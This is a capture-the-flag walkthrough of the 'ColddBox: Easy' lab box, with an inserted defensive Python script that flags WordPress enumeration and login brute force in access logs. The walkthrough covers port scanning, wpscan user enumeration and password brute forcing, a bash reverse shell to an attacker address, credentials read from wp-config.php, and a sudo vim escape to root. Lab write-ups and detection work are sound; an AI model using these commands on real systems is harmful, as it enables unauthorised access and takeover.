ColddBox: Easy (VulnHub)

ColddBox: Easy is a vulnerable machine from TryHackMe that is rated as an easy box.

As usual we are going to start by scanning the box for open ports using nmap. 

Note: first scan all ports, because SSH is not on its default port here; once you know the SSH port you can use the command below.

Command: nmap -p 80,4512 -sC -sV $IP 

On this machine are two open ports:

  • port 80 HTTP
  • port 4512 SSH
Visiting the website we can see a welcome text from the room creator, C0ldd.

Because we already know that this is a WordPress box, I didn't start a gobuster scan; instead I used wpscan to enumerate users.

Command: wpscan --url http://$IP/ --enumerate u

We discovered 4 users. We can use wpscan to brute force the passwords as well.

I've chosen to brute force the password for user c0ldd because that was the name of the creator, so I said I'll give it a try. Luckily I was right:

Command: wpscan --url http://$IP/ --usernames c0ldd --passwords /path/to/wordlist/

Now we can access WordPress as user c0ldd, and luckily this user has administrator privileges.

There are many ways of exploiting WordPress in order to get a reverse shell on the box, but I chose to upload a plugin named WPTerm, which you can download from here: https://wordpress.org/plugins/wpterm/. WPTerm is an xterm-like plugin. It can be used to run non-interactive shell commands from the WordPress admin dashboard.

After installation, activate the plugin and use the command below.

Command used to get a reverse shell: bash -c 'bash -i >& /dev/tcp/$YOUR_IP/$YOUR_PORT 0>&1'
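From the defender's side, the wpscan steps above leave a distinctive trail in the web server's access log. The following added example (not from the original post) parses constructed Apache combined-log lines and flags author-ID/REST user enumeration, a burst of failed wp-login.php POSTs from one address, and a redirecting login that follows such a burst; the IPs, timestamps and thresholds are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log sample (not from the page): a user-enumeration
# sweep, then five failed wp-login.php POSTs and a redirecting (successful) one
# from the same address, plus one ordinary login from another address.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2024:12:00:01 +0000] "GET /?author=1 HTTP/1.1" 301 0 "-" "WPScan v3.8"
10.0.0.5 - - [10/Mar/2024:12:00:02 +0000] "GET /wp-json/wp/v2/users/ HTTP/1.1" 200 812 "-" "WPScan v3.8"
10.0.0.5 - - [10/Mar/2024:12:00:10 +0000] "POST /wp-login.php HTTP/1.1" 200 4120 "-" "WPScan v3.8"
10.0.0.5 - - [10/Mar/2024:12:00:10 +0000] "POST /wp-login.php HTTP/1.1" 200 4120 "-" "WPScan v3.8"
10.0.0.5 - - [10/Mar/2024:12:00:11 +0000] "POST /wp-login.php HTTP/1.1" 200 4120 "-" "WPScan v3.8"
10.0.0.5 - - [10/Mar/2024:12:00:11 +0000] "POST /wp-login.php HTTP/1.1" 200 4120 "-" "WPScan v3.8"
10.0.0.5 - - [10/Mar/2024:12:00:12 +0000] "POST /wp-login.php HTTP/1.1" 200 4120 "-" "WPScan v3.8"
10.0.0.5 - - [10/Mar/2024:12:00:12 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "WPScan v3.8"
10.0.0.9 - - [10/Mar/2024:12:05:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')
ENUM_RE = re.compile(r'^/\?author=\d+|^/wp-json/wp/v2/users')

def detect(log_text, threshold=5, window_s=60):
    """Flag per-IP user enumeration, login bursts, and a success following a burst."""
    enum_hits = defaultdict(int)
    failed, success = defaultdict(list), defaultdict(list)   # ip -> login timestamps
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if m["method"] == "GET" and ENUM_RE.match(m["path"]):
            enum_hits[m["ip"]] += 1
        elif m["method"] == "POST" and m["path"].startswith("/wp-login.php"):
            # WordPress re-renders the form on failure (200) and redirects on success (302).
            (failed if m["status"] == "200" else success)[m["ip"]].append(ts)
    brute = []
    for ip, stamps in failed.items():
        stamps.sort()   # flag if any `threshold` failures fall inside `window_s` seconds
        if any((stamps[i + threshold - 1] - stamps[i]).total_seconds() <= window_s
               for i in range(len(stamps) - threshold + 1)):
            brute.append(ip)
    compromised = [ip for ip in brute if any(t >= failed[ip][0] for t in success[ip])]
    return {"author_enum": sorted(ip for ip, n in enum_hits.items() if n >= 2),
            "login_bruteforce": sorted(brute),
            "success_after_bruteforce": sorted(compromised)}

if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

The single redirecting login from 10.0.0.9 is not flagged, since it is not preceded by a burst of failures; on a real server the thresholds would be tuned to the site's normal login rate.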

Shell as www-data
Now if we check wp-config.php, which you can find in /var/www/html/, you can find the password for user c0ldd.

Use the password cybersecurity to get a shell as user c0ldd (I recommend logging in over SSH to get a stable shell).

If we check the privileges of user c0ldd with the sudo -l command, we can see that we can execute 3 commands as root:
  • /usr/bin/vim
  • /bin/chmod
  • /usr/bin/ftp
I wanted to use vim to get a root shell.
Command: sudo -u root /usr/bin/vim
After that inside vim press : (colon) and type the command below:
Command: !/bin/bash
After you get a root shell you can find both user and root flag!
